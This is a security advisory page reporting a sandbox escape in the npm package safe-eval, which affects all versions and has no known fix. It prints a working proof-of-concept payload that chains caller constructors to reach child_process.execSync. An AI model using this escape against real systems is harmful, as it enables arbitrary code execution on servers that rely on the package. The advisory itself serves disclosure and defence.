Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTlwY2YtaDhxOS02M2Y2
Sandbox Breakout / Arbitrary Code Execution in safe-eval
All versions of safe-eval
are vulnerable to Sandbox Escape leading to Remote Code Execution. A payload chaining a function's callee and caller constructors can escape the sandbox and execute arbitrary code.
For example, the payload
((() => {
const targetKey = Object.keys(this)[0];
Object.defineProperty(this, targetKey, {
get: function() {
return arguments.callee.caller.constructor(
"return global.process.mainModule.require('child_process').execSync('pwd').toString()"
)();
}
});
})();```
may be used to print the `pwd` to the console.
## Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
Permalink: https://github.com/advisories/GHSA-9pcf-h8q9-63f6JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTlwY2YtaDhxOS02M2Y2
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 3 years ago
Updated: over 1 year ago
Identifiers: GHSA-9pcf-h8q9-63f6
References: Blast Radius: 0.0
Affected Packages
npm:safe-eval
Dependent packages: 264Dependent repositories: 2,730
Downloads: 116,601 last month
Affected Version Ranges: >= 0.0.0
No known fixed version
All affected versions: 0.0.0, 0.1.0, 0.2.0, 0.3.0, 0.4.0, 0.4.1